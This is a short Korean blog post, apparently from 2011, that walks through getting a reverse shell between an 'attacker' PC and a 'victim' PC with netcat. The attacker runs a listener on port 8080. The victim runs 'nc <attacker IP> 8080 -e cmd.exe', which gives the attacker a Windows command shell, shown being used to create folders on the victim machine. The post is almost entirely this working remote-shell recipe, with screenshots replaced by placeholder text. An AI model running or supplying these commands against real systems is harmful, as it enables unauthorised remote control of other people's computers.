필요한 도구 - 공격자 (HOST) 희생자 (GUEST)

nc.exe

사용자 삽입 이미지

1. 공격자 pc에서 nc -l -p 8080

을 입력후 대기한다

사용자 삽입 이미지

그리고 희생자 pc에서 nc xxx.xxx.xxx.xxx. 8080 -e cmd.exe 를 입력한다

여기서 IP는 공격자의 IP를 입력한다

사용자 삽입 이미지

다시 공격자 pc로 와서 쉘을 확인하면

그림과 같이 접속되서 cmd 명령이 실행되어있음을 보여준다

사용자 삽입 이미지


희생자 pc에서 폴더생성도 가능하다


사용자 삽입 이미지

보시다시피 mkdir 로 폴더생성하면 희생자 pc 쪽에서 폴더가 생성됨을 볼수있다



2011/11/12 14:45 2011/11/12 14:45

Trackback Address :: 이 글에는 트랙백을 보낼 수 없습니다